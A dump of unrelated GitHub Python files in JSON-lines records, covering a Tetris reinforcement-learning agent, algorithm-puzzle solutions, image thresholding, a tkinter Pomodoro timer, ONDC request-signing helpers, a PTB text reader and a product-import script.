Runs an entire game and records the data\n def perform_iteration(self, rand=False, selective=False):\n self.run(rand)\n final_score = self.TetrisGame.score\n if (selective):\n if (final_score > 0.0):\n self.all_histories.append(self.history)\n self.replay_memory.append(self.sars_data)\n else:\n self.all_histories.append(self.history)\n self.replay_memory.append(self.sars_data)\n self.reset()\n return final_score\n \n # returns self.batch_size samples from replay memory, stored as states, targets, and actions\n def random_batch_samples(self):\n output_data = []\n data_next = []\n output_targets = np.zeros((self.batch_size, 1), dtype=np.float)\n output_actions = []\n rewards = []\n for i in range(self.batch_size):\n episode = random.randint(0, len(self.replay_memory)-1)\n iteration = random.randint(0, len(self.replay_memory[episode])-1)\n output_data.append(self.replay_memory[episode][iteration][0])\n #target = self.compute_target(episode, iteration, self.QDepth)\n \n rewards.append(self.replay_memory[episode][iteration][2])\n data_next.append(self.replay_memory[episode][iteration][3])\n \n #output_targets[i] = target\n output_actions.append(self.replay_memory[episode][iteration][1])\n return output_data, output_actions, rewards, data_next\n \n # Evaluates the target value of states in the replay memory\n # QDepth determines how many steps forward the Q function is computed\n def compute_target(self, episode, iteration, QDepth):\n if (iteration >= len(self.replay_memory[episode])):\n return 0.0\n if (QDepth == 0):\n v = self.evaluate(self.replay_memory[episode][iteration][0])\n outputs = v.data.numpy()\n index = np.argmax(outputs)\n return outputs[0][index]\n return self.replay_memory[episode][iteration][2] + self.Gamma * self.compute_target(episode, iteration + 1, QDepth - 1)\n \n \n def visualize(self, history):\n for i in range(len(history)):\n self.TetrisGame.visualize(history[i])\n \n def convert_replay_mem(self):\n new_replay_mem = []\n for i in range(len(self.replay_memory)):\n new_game = []\n game = self.replay_memory[i]\n for j in range(len(game)):\n new_sars = []\n sars = game[j]\n new_sars.append(self.convert_state(sars[0]))\n new_sars.append(sars[1])\n new_sars.append(sars[2])\n new_sars.append(self.convert_state(sars[3]))\n \n new_game.append(np.array(new_sars))\n new_replay_mem.append(np.array(new_game))\n return np.array(new_replay_mem) \n \n def convert_state(self, state):\n new_state = []\n new_state.append(state[0])\n new_state.append(state[1].to_array())\n new_state.append(state[2].to_array())\n return np.array(new_state)\n \n def recover_replay_mem(self, data):\n replay_mem = []\n for i in range(len(data)):\n new_game = []\n game = data[i]\n for j in range(len(game)):\n new_sars = []\n sars = game[j]\n \n new_sars.append(self.recover_state(sars[0]))\n new_sars.append(sars[1])\n new_sars.append(sars[2])\n new_sars.append(self.recover_state(sars[3]))\n \n new_game.append(np.array(new_sars))\n replay_mem.append(np.array(new_game))\n return np.array(replay_mem)\n \n def recover_state(self, state):\n new_state = []\n new_state.append(state[0])\n new_state.append(from_array(state[1]))\n new_state.append(from_array(state[2]))\n return np.array(new_state)\n \n \n def write_replay_mem(self):\n #print(np.array(self.original_history))\n np.save(\"replay_mem.npy\", self.convert_replay_mem())\n #print(np.load(\"replay_mem.npy\"), \"loaded data\") \n \n def read_replay_mem(self):\n self.replay_memory = np.load(\"replay_mem.npy\")\n self.replay_memory = self.recover_replay_mem(self.replay_memory).tolist()\n print(len(self.replay_memory))\n self.replay_memory = n_copies(self.replay_memory, 10)\n print(len(self.replay_memory))\n #print(self.original_history)\n \ndef stack(s):\n '''\n s is structured as a list containing: [numpy_array_grid, Piece, Piece]\n return:\n depth by h by w numpy array. Top layer is grid, middle layer is current piece, bottom layer is next piece\n '''\n grid = s[0]\n p1 = s[1]\n p2 = s[2]\n shape = (depth, grid.shape[0], grid.shape[1])\n output = np.zeros(shape, dtype=np.float)\n \n # Top layer is the grid\n output[0,:,:] = grid\n \n \"\"\"\n Remove the following five lines if you want to restore the old data structuring.\n This section is for a 1 by h by w output, where the current piece is stored as\n negative 1's. The other option is to do depth x h x w where the piece is stored\n in a deeper layer.\n \"\"\"\n \n \"\"\"\n x = p1.topLeftXBlock-1\n y = p1.topLeftYBlock-1\n w = p1.width\n h = p1.height\n output[0,y:y+h,x:x+w] = -1 * p1.matrix\n \"\"\"\n \n # Middle layer is ones where the current piece is, zero elsewhere\n x = p1.topLeftXBlock-1\n y = p1.topLeftYBlock-1\n w = p1.width\n h = p1.height\n output[1,y:y+h,x:x+w] = p1.matrix\n \n \"\"\"\n # Bottom layer is ones where the next piece will start, zero elsewhere\n x = p2.topLeftXBlock-1\n y = p2.topLeftYBlock-1\n w = p2.width\n h = p2.height\n output[2,y:y+h,x:x+w] = p2.matrix\n \n \"\"\"\n \n return output\n \ndef generateModel():\n num_convolutions_top = [1, 40, 40, 40]\n num_convolutions_bot = [1, 30]\n linear_sizes = [4000, 10000]\n ks_top = [(depth, 5, 5), (1, 3, 3), (1, 2, 2)]\n ks_bot = [(depth, 4, width)]\n output = Net(num_convolutions_top, num_convolutions_bot, linear_sizes, ks_top, ks_bot)\n return output\n \ndef n_copies(list_to_copy, n):\n output = []\n for i in range(len(list_to_copy)):\n for j in range(n):\n output.append(copy.deepcopy(list_to_copy[j]))\n \n return output \n \ndef main():\n # Define your policy\n policy = generateModel()\n policy = torch.nn.DataParallel(policy).cuda()\n print(policy)\n # Define your optimizer\n optimizer = optim.SGD(policy.parameters(), lr=5e-5, momentum=0.5)\n # Declare Agent - it is constructed assuming it is to be trained\n Agent = MyAgent(10, 20, policy, optimizer)\n #print (\"Generating replay memory . . .\")\n #Agent.generate_replay_memory()\n #Agent.write_replay_mem()\n Agent.read_replay_mem()\n \n \n print (\"Training . . .\")\n Agent.train(1000)\n print (\"Testing . . .\")\n Agent.test(50)\n # Visualize random games\n Agent.visualize(Agent.testing_history)\n \n \n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"mcguiremichael/TetrisAI","sub_path":"McGuireAI.py","file_name":"McGuireAI.py","file_ext":"py","file_size_in_byte":19439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72176856233","text":"import copy\r\n\r\ndef solution(k, A):\r\n answer = ''\r\n max_ = copy.deepcopy(A)\r\n for i in range(0, 2*len(max_)+1, 2):\r\n max_.insert(i, '')\r\n num = 9\r\n for i in range(len(max_)):\r\n if max_[i] == '>':\r\n for j in range(i-1, -1, -2):\r\n if max_[j] == '':\r\n max_[j] = str(num)\r\n num -= 1\r\n else:\r\n break\r\n for i in range(len(max_)-1, -1, -1):\r\n if max_[i] == '':\r\n max_[i] = str(num)\r\n num -= 1\r\n for i in range(0, len(max_), 2):\r\n answer += max_[i]\r\n return answer\r\n\r\ndef solution2(k, A):\r\n answer = ''\r\n min_ = copy.deepcopy(A)\r\n for i in range(0, 2*len(min_)+1, 2):\r\n min_.insert(i, '')\r\n num = len(min_)//2\r\n for i in range(len(min_)-1, -1, -1):\r\n if min_[i] == '<':\r\n for j in range(i+1, len(min_), 2):\r\n if min_[j] == '':\r\n min_[j] = str(num)\r\n num -= 1\r\n else:\r\n break\r\n idx = set()\r\n for i in range(0, len(min_), 2):\r\n if min_[i] == '':\r\n if i != len(min_)-1:\r\n if min_[i+1] == '>':\r\n idx.add(i)\r\n else:\r\n if idx:\r\n for index in list(set(idx)):\r\n min_[index] = str(num)\r\n num -= 1\r\n idx = set()\r\n if idx:\r\n for index in list(set(idx)):\r\n min_[index] = str(num)\r\n num -= 1\r\n for i in range(len(min_)-1, -1, -1):\r\n if min_[i] == '':\r\n min_[i] = str(num)\r\n num -= 1\r\n for i in range(0, len(min_), 2):\r\n answer += min_[i]\r\n return answer\r\n\r\nk = int(input())\r\nA = list(map(str, input().split()))\r\nprint(solution(k, A))\r\nprint(solution2(k, A))","repo_name":"khw5123/Algorithm","sub_path":"BOJ/그리디/부등호.py","file_name":"부등호.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16714360036","text":"#============================================================================================\n# Circularity Based Thresholding Function\n# Author: Gerald M\n#\n# This function returns the threshold at which the image has the highest mean circularity.\n#============================================================================================\n\nimport scipy.ndimage\nfrom scipy.optimize import curve_fit\nimport numpy as np\nimport math, csv\nfrom multiprocessing import Pool, cpu_count, Array, Manager\nfrom functools import partial\nfrom skimage.measure import regionprops, label\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndef func(x, a, x0, sigma):\n return a*np.exp(-(x-x0)**2/(2*sigma**2))\n\ndef circularity(thresh, A, SIZE):\n A_thresh = (A>thresh).astype(int)\n A_thresh = scipy.ndimage.morphology.binary_fill_holes(A_thresh).astype(int)\n\n #Image.fromarray(A_thresh.astype(float)).save('/Users/gm515/Desktop/temp/circ/'+str(thresh)+'.tif')\n\n A_label = label(A_thresh, connectivity=A_thresh.ndim)\n\n # Find circularity\n circfunc = lambda r: (4 * math.pi * r.area) / (r.perimeter * r.perimeter)\n\n circ = [circfunc(region) for region in regionprops(A_label) if region.area>SIZE and region.area0]\n\n if len(circ)>0:\n return np.mean(np.array(circ))\n else:\n return 0.\n\ndef circthresh(A,SIZE,THRESHLIM):\n thresh_int = 2\n thresh_all = np.arange(np.min(A),np.max(A),thresh_int)\n\n # Get mean circularity\n pool = Pool(cpu_count())\n circ_all = np.squeeze(np.array([pool.map(partial(circularity, A=A, SIZE=SIZE), thresh_all)]), axis=0)\n pool.close()\n pool.join()\n\n # Fit a polynomial and find optimum threshold where circualrity measures are grater than 1\n # func = np.polyfit(thresh_all[circ_all>0], circ_all[circ_all>0], 2)\n # yfit = np.poly1d(func)\n # print yfit(thresh_all[circ_all>0])\n\n plot = False\n if plot:\n plt.figure()\n plt.plot(thresh_all, circ_all, 'xb')\n plt.plot(thresh_all[circ_all>0], yfit(thresh_all[circ_all>0]), '-r')\n plt.savefig('/Users/gm515/Desktop/test/fig.png')\n\n #T = thresh_all[np.where(yfit(thresh_all[circ_all>0]) == np.max(yfit(thresh_all[circ_all>0])))]\n T = thresh_all[np.argmax(circ_all>0.8)]\n\n # If threshold from fit is less than minimum threshold limit, set optimum threshold to minimum\n if Ti-z:\n return \"impossible\"\n temp=(i-arr[i]-z)+arr[z]\n if temp None:\n self.capacity = capacity\n \n def fill_tank(self, fill_amount) -> None:\n if self.is_full(): return\n self.holding += fill_amount\n \n def is_full(self)->bool:\n return self.holding >= self.capacity\n \n def __str__(self) -> str:\n rounded_holding = Decimal(self.holding).quantize(Decimal('0.1'), rounding=decimal.ROUND_HALF_UP)\n rounded_holding = str(rounded_holding)\n big_num,little_num = list(map(int, rounded_holding.split('.')))\n big_num = big_num*10\n numerator = big_num + little_num\n greatest_common_denominator = gcd(numerator, 10)\n numerator = int(numerator/greatest_common_denominator)\n denominator = int(10/greatest_common_denominator)\n return f'{numerator}/{denominator}' if denominator > 1 else str(numerator)\nfor _ in range(int(input())):\n fuel_available, tank_count = list(map(int,input().split()))\n tank_capacities = list(map(int,input().split()))\n tank_objects = [tank(tank_capacities[idx]) for idx in range(tank_count)]\n\n while fuel_available > 0:\n for tank_object in tank_objects:\n if not tank_object.is_full(): fuel_available -= 0.01\n tank_object.fill_tank(0.01)\n \n tank_objects = list(map(str, tank_objects))\n print(' '.join(tank_objects))\n \n \n","repo_name":"Chenzo46/Coding-problems","sub_path":"bankruptOnFuel.py","file_name":"bankruptOnFuel.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42386525492","text":"import argparse\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('filename', type=argparse.FileType(mode='rt'), help='file name')\n\n return parser\n\n\ndef main():\n parser = create_parser()\n args = parser.parse_args()\n count = 0\n for _ in args.filename:\n count += 1\n print(count)\n\n\nif __name__ == '__main__':\n main()","repo_name":"nstrashevskii/py_110_for_git","sub_path":"prac_3/file_len.py","file_name":"file_len.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33849345215","text":"# 100 Days of Code: Python\n# May 22, 2022\n# Pomodoro app with tkinter\n# Effective time management work timer\n\n# Import modules\nfrom tkinter import *\nimport math\n\n# Constants\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\n\n# Function for timer reset\ndef reset_timer():\n global reps\n reps = 0\n check_marks.config(text=\"\")\n timer_label.config(text=\"Timer\", fg=GREEN)\n canvas.itemconfig(timer_text, text=\"00:00\")\n window.after_cancel(timer)\n\n# Function for timer mechanism\ndef start_timer():\n global reps\n reps += 1\n\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n\n # if it's the 1st/3rd/5th/7th rep:\n if reps % 8 == 0:\n timer_label.config(text=\"Break\", fg=RED)\n count_down(long_break_sec)\n elif reps % 2 == 0:\n timer_label.config(text=\"Break\", fg=PINK)\n count_down(short_break_sec)\n else:\n timer_label.config(text=\"Work\", fg=GREEN)\n count_down(work_sec)\n num_marks = math.floor(reps / 2)\n marks_list = []\n for m in range(num_marks):\n marks_list.append(\"✔\")\n check_marks.config(text=\"\".join(marks_list))\n\n# Fuction for timer countdown\ndef count_down(count):\n count_min = math.floor(count / 60)\n count_sec = count % 60\n if count_sec < 10:\n count_sec = f\"0{count_sec}\"\n\n canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n global timer\n timer = window.after(1000, count_down, count - 1)\n else:\n start_timer()\n\n# UI setup\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\ncanvas.create_image(100, 112, image=tomato_img)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(column=2, row=2)\n\ntimer_label = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 40, \"bold\"))\ntimer_label.grid(column=2, row=1)\n\nstart_button = Button(text=\"Start\", highlightthickness=0, command=start_timer)\nstart_button.grid(column=1, row=3)\n\nreset_button = Button(text=\"Reset\", highlightthickness=0, command=reset_timer)\nreset_button.grid(column=3, row=3)\n\ncheck_marks = Label(fg=GREEN, bg=YELLOW)\ncheck_marks.grid(column=2, row=4)\n\n# Window controls\nwindow.mainloop()","repo_name":"gdbecker/100DaysOfCodePython","sub_path":"02 - Intermediate/Day 028 - Pomodoro App/PomodoroApp.py","file_name":"PomodoroApp.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6604540926","text":"# coding=utf-8\nimport requests\nimport re\n\n#url = 'http://10.10.0.244:10080/dsp/config/v2/getFrequencyTree'\nuri = \"http://122.112.251.59:20090\"\n\nurl = \"%s/api/v1/call-account\"%uri #/api/v1/get-account-status?account=330100b002\nheader = {\"content-type\": 'application/json; charset=UTF-8',\n \"User-Agent\":\"Mozilla/5.0 \",\n \"x-xzl-appkey\": \"appkey12\"\n }\n\n\ndata = {\n \"talktype\":1,\n \"passwd\":\"123456\",\n \"priority\":22\n}\n\n\n\nstart = 100000\nend = 100001\nwhile start < end:\n aa = format(start, \"0>4\")\n ac = \"3301%s2\" % aa\n data[\"account\"] = ac\n response = requests.post(url, json=data, headers=header)\n print(response.status_code, response.json())\n start += 1\n","repo_name":"zq0324/zq","sub_path":"demo_interface_test/testResquests.py","file_name":"testResquests.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23192896765","text":"from django.conf.urls import include, url\nfrom views import index, play, pause, stop, seek, current_playing, upload_file\n\nurlpatterns = [\n url(r'^$', index),\n url(r'^play/(?P[a-zA-Z0-9\\.\\-]+)', play),\n url(r'^pause', pause),\n url(r'^stop', stop),\n url(r'^seek/(?P[\\d]+)', seek),\n url(r'^current_playing', current_playing),\n url(r'^upload', upload_file)\n]\n","repo_name":"Vizualni/hometv","sub_path":"hometvapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15668240469","text":"import copy\nimport torch\nimport numpy as np\n\n__all__ = ['elbo_subset', 'elbo_mm']\n\n\ndef elbo_subset(model, x, y, mask, num_samples=1, k=1, p=0.5):\n elbo = 0\n for _ in range(k):\n mask_q = copy.deepcopy(mask)\n for n, row in enumerate(mask):\n row_q = copy.deepcopy(row)\n data_idx = torch.where(row == 1)[0]\n to_remove = np.random.binomial(len(data_idx) - 1, p=p)\n remove_idx = np.random.choice(data_idx.numpy(), size=[to_remove],\n replace=False)\n\n row_q[remove_idx] = 0\n mask_q[n, :] = row_q\n\n elbo += model.elbo(x, y, mask, mask_q, num_samples)\n\n return elbo\n\n\ndef elbo_mm(model, x, y, mask, num_samples, k, p=0.5):\n \"\"\"Monte Carlo estimate of the evidence lower bound from the Multimodal\n VAE.\"\"\"\n elbo = model.elbo(x, y, mask, num_samples=num_samples)\n\n elbos_n = 0\n for n in range(y.shape[1]):\n mask_q = copy.deepcopy(mask)\n mask_q[:, n] = 0\n elbos_n += model.elbo(x, y, mask, mask_q, num_samples)\n\n elbos_k = 0\n for _ in range(k):\n mask_q = copy.deepcopy(mask)\n for n, row in enumerate(mask):\n row_q = copy.deepcopy(row)\n data_idx = torch.where(row == 1)[0]\n to_remove = np.random.binomial(len(data_idx)-1, p=p)\n remove_idx = np.random.choice(data_idx.numpy(), size=[to_remove],\n replace=False)\n\n row_q[remove_idx] = 0\n mask_q[n, :] = row_q\n\n elbos_k += model.elbo(x, y, mask, mask_q, num_samples)\n\n elbo += elbos_n + elbos_k\n\n return elbo\n","repo_name":"MattAshman/sgpvae","sub_path":"sgpvae/utils/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"11383350319","text":"import base64\nimport datetime\nimport re\nimport uuid\n\nimport nacl.encoding\nimport nacl.hash\nimport json\nfrom nacl.bindings import crypto_sign_ed25519_sk_to_seed\nfrom nacl.signing import SigningKey, VerifyKey\n\nfrom main.config import get_config_by_name\nfrom main.models.subscriber import subscriber_type_mapping\n\n\ndef hash_message(msg: str):\n hasher = nacl.hash.blake2b\n digest = hasher(bytes(msg, 'utf-8'), digest_size=64, encoder=nacl.encoding.Base64Encoder)\n digest_str = digest.decode(\"utf-8\")\n return digest_str\n\n\ndef create_signing_string(digest_base64, created=None, expires=None):\n signing_string = f\"\"\"(created): {created}\n(expires): {expires}\ndigest: BLAKE-512={digest_base64}\"\"\"\n return signing_string\n\n\ndef sign_response(signing_key, private_key):\n private_key64 = base64.b64decode(private_key)\n seed = crypto_sign_ed25519_sk_to_seed(private_key64)\n signer = SigningKey(seed)\n signed = signer.sign(bytes(signing_key, encoding='utf8'))\n signature = base64.b64encode(signed.signature).decode()\n return signature\n\n\ndef verify_response(signature, signing_key, public_key):\n try:\n public_key64 = base64.b64decode(public_key)\n VerifyKey(public_key64).verify(bytes(signing_key, 'utf8'), base64.b64decode(signature))\n return True\n except Exception:\n return False\n\n\ndef get_filter_dictionary_or_operation(filter_string):\n filter_string_list = re.split(',', filter_string)\n filter_string_list = [x.strip(' ') for x in filter_string_list] # to remove white spaces from list\n filter_dictionary_or_operation = dict()\n for fs in filter_string_list:\n splits = fs.split('=', maxsplit=1)\n key = splits[0].strip()\n value = splits[1].strip()\n filter_dictionary_or_operation[key] = value.replace(\"\\\"\", \"\")\n return filter_dictionary_or_operation\n\n\ndef create_authorisation_header(request_body, created=None, expires=None):\n created = int(datetime.datetime.now().timestamp()) if created is None else created\n expires = int((datetime.datetime.now() + datetime.timedelta(hours=1)).timestamp()) if expires is None else expires\n signing_key = create_signing_string(hash_message(json.dumps(request_body, separators=(',', ':'))),\n created=created, expires=expires)\n signature = sign_response(signing_key, private_key=get_config_by_name(\"BAP_PRIVATE_KEY\"))\n\n subscriber_id = get_config_by_name(\"BAP_ID\")\n unique_key_id = get_config_by_name(\"BAP_UNIQUE_KEY_ID\")\n header = f'Signature keyId=\"{subscriber_id}|{unique_key_id}|ed25519\",algorithm=\"ed25519\",created=' \\\n f'\"{created}\",expires=\"{expires}\",headers=\"(created) (expires) digest\",signature=\"{signature}\"'\n return header\n\n\ndef verify_authorisation_header(auth_header, request_body_str, public_key):\n header_parts = get_filter_dictionary_or_operation(auth_header.replace(\"Signature \", \"\"))\n created = int(header_parts['created'])\n expires = int(header_parts['expires'])\n current_timestamp = int(datetime.datetime.now().timestamp())\n if created <= current_timestamp <= expires:\n signing_key = create_signing_string(hash_message(request_body_str), created=created, expires=expires)\n return verify_response(header_parts['signature'], signing_key, public_key=public_key)\n else:\n return False\n\n\ndef generate_key_pairs():\n signing_key = SigningKey.generate()\n private_key = base64.b64encode(signing_key._signing_key).decode()\n public_key = base64.b64encode(bytes(signing_key.verify_key)).decode()\n return private_key, public_key\n\n\ndef sign_registry_request(request):\n req_obj = []\n req_obj.append(request.get('country')) if request.get('country') else None\n req_obj.append(request.get('domain')) if request.get('domain') else None\n req_obj.append(request.get('type')) if request.get('type') else None\n req_obj.append(request.get('city')) if request.get('city') else None\n req_obj.append(request.get('subscriber_id')) if request.get('subscriber_id') else None\n\n signing_string = \"|\".join(req_obj)\n return sign_response(signing_string, private_key=get_config_by_name(\"BAP_PRIVATE_KEY\"))\n\n\ndef format_registry_request_for_pre_prod(request, vlookup=False):\n request['type'] = subscriber_type_mapping[request['type']]\n if vlookup:\n signature = sign_registry_request(request)\n return {\n \"sender_subscriber_id\": get_config_by_name(\"BAP_ID\"),\n \"request_id\": str(uuid.uuid4()),\n \"timestamp\": datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3]+\"Z\",\n \"search_parameters\": request,\n \"signature\": signature\n }\n else:\n return request\n\n\nif __name__ == '__main__':\n request_body1 = {\"context\":{\"domain\":\"nic2004:60212\",\"country\":\"IND\",\"city\":\"Kochi\",\"action\":\"search\",\"core_version\":\"0.9.1\",\"bap_id\":\"bap.stayhalo.in\",\"bap_uri\":\"https://8f9f-49-207-209-131.ngrok.io/protocol/\",\"transaction_id\":\"e6d9f908-1d26-4ff3-a6d1-3af3d3721054\",\"message_id\":\"a2fe6d52-9fe4-4d1a-9d0b-dccb8b48522d\",\"timestamp\":\"2022-01-04T09:17:55.971Z\",\"ttl\":\"P1M\"},\"message\":{\"intent\":{\"fulfillment\":{\"start\":{\"location\":{\"gps\":\"10.108768, 76.347517\"}},\"end\":{\"location\":{\"gps\":\"10.102997, 76.353480\"}}}}}}\n # os.environ[\"BAP_PRIVATE_KEY\"] = \"lP3sHA+9gileOkXYJXh4Jg8tK0gEEMbf9yCPnFpbldhrAY+NErqL9WD+Vav7TE5tyVXGXBle9ONZi2W7o144eQ==\"\n # os.environ[\"BAP_PUBLIC_KEY\"] = \"awGPjRK6i/Vg/lWr+0xObclVxlwZXvTjWYtlu6NeOHk=\"\n # private_key1, public_key1 = generate_key_pairs()\n # os.environ[\"BAP_PRIVATE_KEY\"] = private_key1\n # os.environ[\"BAP_PUBLIC_KEY\"] = public_key1\n auth_header1 = create_authorisation_header(request_body1)\n print(auth_header1)\n print(verify_authorisation_header(auth_header1, request_body1))\n","repo_name":"ONDC-Official/py-protocol-layer","sub_path":"webserver/main/utils/cryptic_utils.py","file_name":"cryptic_utils.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"45108687135","text":"import collections\nimport os\nimport tensorflow as tf\n\n\ndef _read_words(filename):\n with tf.gfile.GFile(filename, \"r\") as f:\n return f.read().decode(\"utf-8\").replace(\"\\n\", \"\").split()\n\n\ndef _build_vocab(filename):\n data = _read_words(filename)\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n return word_to_id\n\n\ndef _file_to_word_ids(filename, word_to_id):\n data = _read_words(filename)\n return [word_to_id[word] for word in data if word in word_to_id]\n\n\ndef ptb_raw_data(data_path=None):\n train_path = os.path.join(data_path, \"ptb.train.txt\")\n valid_path = os.path.join(data_path, \"ptb.valid.txt\")\n test_path = os.path.join(data_path, \"ptb.test.txt\")\n\n word_to_id = _build_vocab(train_path)\n train_data = _file_to_word_ids(train_path, word_to_id)\n valid_data = _file_to_word_ids(valid_path, word_to_id)\n test_data = _file_to_word_ids(test_path, word_to_id)\n vocabulary = len(word_to_id)\n return train_data, valid_data, test_data, vocabulary\n\n\ndef ptb_producer(raw_data, batch_size, num_steps, name=None):\n with tf.name_scope(name, \"PTBProducer\", [raw_data, batch_size, num_steps]):\n raw_data = tf.convert_to_tensor(raw_data, name=\"raw_data\", dtype=tf.int32)\n data_len = tf.size(raw_data)\n batch_len = data_len // batch_size\n data = tf.reshape(raw_data[0 : batch_size * batch_len],\n [batch_size, batch_len])\n epoch_size = (batch_len - 1) // num_steps\n assertion = tf.assert_positive(\n epoch_size,\n message=\"epoch_size == 0, decrease batch_size or num_steps\")\n with tf.control_dependencies([assertion]):\n epoch_size = tf.identity(epoch_size, name=\"epoch_size\")\n i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\n x = tf.strided_slice(data, [0, i * num_steps],\n [batch_size, (i + 1) * num_steps])\n x.set_shape([batch_size, num_steps])\n y = tf.strided_slice(data, [0, i * num_steps + 1],\n [batch_size, (i + 1) * num_steps + 1])\n y.set_shape([batch_size, num_steps])\n return x, y\n","repo_name":"GPrathap/sound_classifier","sub_path":"try/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10706559765","text":"class Hexagon():\n def __init__(self, a, b, c, d, e, f):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n self.e = e\n self.f = f\n print(\"Created!\")\n\n def calculate_perimeter(self):\n return self.a + self.b + self.c + self.d + self.e + self.f\n\nhex1 = Hexagon(1,1,1,1,1,1)\n\nprint(hex1.calculate_perimeter())\n\n","repo_name":"GuyChapGH/calthoff","sub_path":"object-oriented/challenge_oop_1_4.py","file_name":"challenge_oop_1_4.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32127610721","text":"bloques = int(input(\"Ingrese el Numero de bloques: \"))\n\naltura = 0\ncapas = 1 # Altura se basa en las capas completas usadas por los bloques, es decir que los capas se incrementa en 1\n # + -> capas = 1\n # ** -> capas + 1 = 2\n # *** -> capas + 1 = 3\nbase = 0\n\nwhile altura < bloques: # El altura no puede ser mayor a los bloques, por logica.\n bloques -= capas # Las capas restan a los bloques, ya que las capas contienen bloques\n altura += 1 # La altura son las capas completas\n capas += 1\n base += 1\nelse:\n if bloques != 0:\n base += 1\n\nprint(\"La Base de la piramide es \"+ str(base))\nprint(\"La altura de la piramide es \"+str(altura))","repo_name":"Chess10/PYTHON","sub_path":"FUNDAMENTOS DE PROGRAMACION/1. Fundamentos Basicos/EJERCICIOS/Altura de una Piramide.py","file_name":"Altura de una Piramide.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"503013077","text":"import os\nfrom controllers import CategoryController, \\\n InOutProductVariableController, \\\n ProductController, \\\n ProductImageController, \\\n ProductVariableController, \\\n ProductVariableValueController, \\\n VariableValueController\n\nif __name__ == \"__main__\":\n root_path = os.getcwd()\n\n # Lấy thông tin các danh mục cần thiết\n print(\"Lấy thông tin các danh mục cần thiết\")\n category_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_category.xlsx\",\n \"sheet\": \"category\"\n }\n\n variable_value_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_variable-value.xlsx\",\n \"sheet\": \"variable-value\"\n }\n\n category_controller = CategoryController(category_file[\"path_full\"], category_file[\"sheet\"])\n variable_value_controller = VariableValueController(variable_value_file[\"path_full\"], variable_value_file[\"sheet\"])\n\n # Đọc thông tin từ file excel cần import\n print(\"Đọc thông tin từ file excel cần import\")\n product_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_san-pham.xlsx\",\n \"sheet\": \"san-pham\"\n }\n product_variable_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_bien-the.xlsx\",\n \"sheet\": \"bien-the\"\n }\n\n product_controller = ProductController(product_file[\"path_full\"], product_file[\"sheet\"], category_controller)\n product_image_controller = ProductImageController(product_controller)\n product_variable_controller = ProductVariableController(product_variable_file[\"path_full\"],\n product_variable_file[\"sheet\"],\n product_controller)\n product_variable_value_controller = ProductVariableValueController(product_variable_controller,\n variable_value_controller)\n in_out_product_variable_controller = InOutProductVariableController(product_controller,\n product_variable_controller,\n variable_value_controller)\n\n # Update thông tin table chính từ table phụ\n print(\"Update thông tin table chính từ table phụ\")\n product_controller.update_product_variable(product_variable_controller.product_parents)\n\n # Xuất file sql import\n print(\"Xuất file sql import\")\n category_controller.export_sql()\n variable_value_controller.export_sql()\n product_controller.export_sql()\n product_image_controller.export_sql()\n product_variable_controller.export_sql()\n product_variable_value_controller.export_sql()\n in_out_product_variable_controller.export_sql()\n\n print(\"Ket thuc chuong 